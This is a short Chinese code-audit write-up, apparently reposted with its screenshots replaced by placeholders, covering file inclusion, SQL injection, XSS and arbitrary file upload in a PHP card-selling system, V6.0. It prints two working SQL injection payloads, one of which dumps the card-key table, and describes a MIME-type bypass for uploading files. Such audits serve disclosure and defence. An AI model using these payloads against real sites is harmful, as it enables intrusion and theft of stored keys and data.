代码审计(某个人发卡系统V6.0(php))

一、前台漏洞

1、前台文件包含漏洞(如果开启了gbc,可远程包含)

代码审计(某个人发卡系统V6.0(php))_第1张图片

代码审计(某个人发卡系统V6.0(php))_第2张图片

注入点1:代码审计(某个人发卡系统V6.0(php))_第3张图片

tyid没任何过滤,存在注入

payload:http://faka.com/ajax.php?act=selgo

POST传参:

tyid=1/**/union/**/select/**/*/**/from/**/if_km/**/limit/**/0,1#

代码审计(某个人发卡系统V6.0(php))_第4张图片

注入点2:

代码审计(某个人发卡系统V6.0(php))_第5张图片

也是没加任何过滤

POST传参

payload:

out_trade_no=1',1,33,'','2023-11-09 21:23:52','',2),((select version()),(select database()),(select user()),'','2023-11-09 21:23:52','',2)#&number=2&gid=1&money=33

代码审计(某个人发卡系统V6.0(php))_第6张图片

代码审计(某个人发卡系统V6.0(php))_第7张图片

注入点3:

代码审计(某个人发卡系统V6.0(php))_第8张图片

代码审计(某个人发卡系统V6.0(php))_第9张图片

xss

代码审计(某个人发卡系统V6.0(php))_第10张图片

代码审计(某个人发卡系统V6.0(php))_第11张图片

二、后台漏洞

1、任意文件上传

代码审计(某个人发卡系统V6.0(php))_第12张图片

只判断了文件的类型是否属于数组中的类型,并未对文件后缀进行判断,即造成任意文件上传

需要抓包改一下文件类型

代码审计(某个人发卡系统V6.0(php))_第13张图片

代码审计(某个人发卡系统V6.0(php))_第14张图片

代码审计(某个人发卡系统V6.0(php))_第15张图片

代码审计(某个人发卡系统V6.0(php))_第16张图片

你可能感兴趣的:(代码审计,php,开发语言)